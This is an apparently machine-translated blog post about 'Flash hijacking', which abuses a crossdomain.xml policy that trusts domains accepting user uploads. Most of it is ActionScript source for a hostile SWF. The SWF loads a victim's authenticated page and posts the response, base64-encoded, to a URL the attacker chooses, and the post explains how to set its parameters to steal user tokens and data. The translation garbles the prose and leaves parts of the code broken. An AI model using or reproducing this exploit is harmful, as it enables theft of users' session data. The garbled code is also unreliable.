Flash macromedia launched by the company's standard interactive vector graphics and animation for the Web, acquired by Adobe. Flash animation do people called flashers.
How to detect whether the flash hijacking problem?
iis7 website monitoring
hijacked websites, pollution, flash hijacking can be detected.
Flash hijacking
When we dig src vulnerabilities, find an interface or a page response content, there is a user or a user's token information that uniquely identifies the time, with access to the WWW. **. COM / crossdomain.xml
<Cross-Domain -policy>
<from-the allow-Access Domain = "*. qq.com" />
<from-the allow-Access Domain = "*. gtimg.com" />
</-Cross-Domain Policy>
presence of the above situation, forward to. com find ** you can upload a picture can hijack user rights.
hijack Source:
Package {
Import the flash.display.Sprite;
Import flash.events.Event;
Import flash.net The *;.
Import flash.utils.ByteArray;
Import the flash.text.TextField;
private static const _encodeChars:Vector.<int> = _initEncoreChar();
public function hijack()
{
var params:Object=root.loaderInfo.parameters;
var jpg:URLRequest = new URLRequest(params.jpg);
jpg.method = URLRequestMethod.GET;
sendToURL(jpg);
var request:URLRequest = new URLRequest(params.get);
request.method = URLRequestMethod.GET;
var loader:URLLoader=new URLLoader();
loader.addEventListener(Event.COMPLETE,completeHandler);
function completeHandler(event:Event):void{
var data:String=(loader.data);
var postURLrequest:URLRequest = new URLRequest(params.post);
postURLrequest.method = URLRequestMethod.POST;
var postdata:Object = new Array();
postdata[0]=encode(data);
postURLrequest.data = postdata[0];
sendToURL(postURLrequest);
}
loader.load(request);
}
public static function encode(data:String):String {
var bytes:ByteArray = new ByteArray();
bytes.writeUTFBytes(data);
return encodeByteArray(bytes);
}
public static function encodeByteArray(data:ByteArray):String {
var out:ByteArray = new ByteArray();
//Presetting the length keep the memory smaller and optimize speed since there is no "grow" needed
out.length = (2 + data.length - ((data.length + 2) % 3)) * 4 / 3; //Preset length //1.6 to 1.5 ms
var i:int = 0;
var r:int = data.length % 3;
var len:int = data.length - r;
var c:uint; //read (3) character AND write (4) characters
var outPos:int = 0;
while(i < len) {
//Read 3 Characters (8bit * 3 = 24 bits)
c = data[int(i++)] << 16 | data[int(i++)] << 8 | data[int(i++)];
out[int(outPos++)] = _encodeChars[int(c >>> 18)];
out[int(outPos++)] = _encodeChars[int(c >>> 12 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c >>> 6 & 0x3f)];
out[int(outPos++)] = _encodeChars[int(c & 0x3f)];
}
//Need two "=" padding
if(r == 1) {
//Read one char, write two chars, write padding
c = data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 2)];
out[int(outPos++)] = _encodeChars[int((c & 0x03) << 4)];
out[int(outPos++)] = 61;
out[int(outPos++)] = 61;
}
//Need one "=" padding
else if(r == 2) {
c = data[int(i++)] << 8 | data[int(i)];
out[int(outPos++)] = _encodeChars[int(c >>> 10)];
out[int(outPos++)] = _encodeChars[int(c >>> 4 & 0x3f)];
out[int(outPos++)] = _encodeChars[int((c & 0x0f) << 2)];
out[int(outPos++)] = 61;
}
return out.readUTFBytes(out.length);
}
private static function _initEncoreChar():Vector.<int> {
var encodeChars:Vector.<int> = new Vector.<int>(64, true);
// We Could Push The Number Directly
// But the I Think IT apos Nice to See The characters (with NO overhead ON encode / decode)
var chars: String = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 + /";
for (var I: int = 0; I <64 ; I ++) {
encodeChars [I] = chars.charCodeAt (I);
}
return encodeChars;
}
}
}
parameters:
JPG: the image domain (for loading priority crossdomain.xml, hijacking or slow loading interface can not cause hijacking)
GET: hijacked interface or page
post: receiving over the hijacking of the page is base64 transmission
What flash that? How to detect flash hijacking problem?
Guess you like
Origin www.cnblogs.com/goodcola/p/11527038.html
Ranking